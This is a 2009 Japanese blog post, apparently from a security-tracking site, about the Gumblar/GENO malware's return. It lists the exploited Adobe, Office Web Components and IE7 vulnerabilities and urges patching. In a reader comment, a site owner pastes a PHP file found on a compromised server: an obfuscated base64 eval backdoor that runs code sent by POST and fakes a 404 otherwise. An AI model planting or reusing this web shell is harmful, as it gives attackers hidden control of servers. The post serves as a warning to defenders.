ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫全体表示

イメージ 1

 
 2009年10月になって戻ってきた「Gumblar」「JSRedir-R」(GENOウイルス)の攻撃者。今回、ユーザーの意思関係なくウイルス本体を発動させるため、攻撃者が用意したソフトウェアの脆弱性を突く処理をピックアップ。

 ちなみに、前回の5月の騒動では、PDF閲覧ソフト「Adobe Reader」と動画再生アドオン「Adobe Flash Player」の旧バージョンにある脆弱性を悪用してました。あと、サイトに挿入される難読化されたJavaScriptコードには、なぜかターゲットとなるWindowsの種類やブラウザを振り分ける処理が含まれてました。

 今回はブラウザの絞りはないようで、基本的にWindowsユーザーがターゲットになってます。そして、タイミング(?)により読み込まれる不正なデータが異なりますが、いちばん処理が多いもの(上画像)を紹介しておきます。
・Adobe Reader の脆弱性
・Adobe Flash Player の脆弱性
・Microsoft Office Web コンポーネント の脆弱性 (MS09-043
・Internet Explorer 7 の脆弱性 (MS09-002

 Adobe系ソフトウェア2つの最新版への更新と、Windows Update(Microsoft Update)がちゃんと行われていれば、改ざん被害を受けてしまったページをブラウザで単に見ただけでウイルスが発動してしまう状況は回避できます。

Gumblar(GENOウイルス)の最新情報はコチラ



(20日追記...)
 ScanSafeに続くセキュリティ会社のアラート。IBM Internet Security Systemsってとこのブログにて「Gumblar Reloaded」という19日付の記事を掲載。

  • 顔アイコン

    Gumblaerが悪用する脆弱性を特定するにあたり、掲載しているコードを最低限のみ引用させていただきました。以下がそのまとめです。ご参考になれば嬉しいです。
    http://d.hatena.ne.jp/kaito834/20091025/1256437910 削除

    [ kaito834 ]

    2009/10/25(日) 午前 11:47

    返信する
  • 手元のサーバーの html, php, jsファイルは改ざんされてい
    ました。

    flash(swf),PDFファイルも改ざんされる可能性があるという
    ことでしょうか。

    うまやど

    2009/10/26(月) 午後 10:23

    返信する
  • 顔アイコン

    swf、pdf自体は別にいじられないです。

    [ noooo_spam ]

    2009/10/27(火) 午後 10:12

    返信する
  • 顔アイコン

    ありがとうございます。安心しました。

    今回のウイルスのせいなのかわかりませんが、
    ランダムなファイル名のテキストファイルが
    6つ生成されているフォルダがみつかりました。
    そこには、phpファイル2つも生成されていました。

    phpのほうの中身は、

    <?php eval(base64_decode("aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7"));?>

    だけでした。

    うまやど

    2009/10/27(火) 午後 11:02

    返信する

顔アイコン

顔アイコン・表示画像の選択

絵文字
×
  • オリジナル
  • SoftBank1
  • SoftBank2
  • SoftBank3
  • SoftBank4
  • docomo1
  • docomo2
  • au1
  • au2
  • au3
  • au4
  • 名前
  • パスワード
  • ブログ

開くトラックバック(2)

本文はここまでですこのページの先頭へ
みんなの更新記事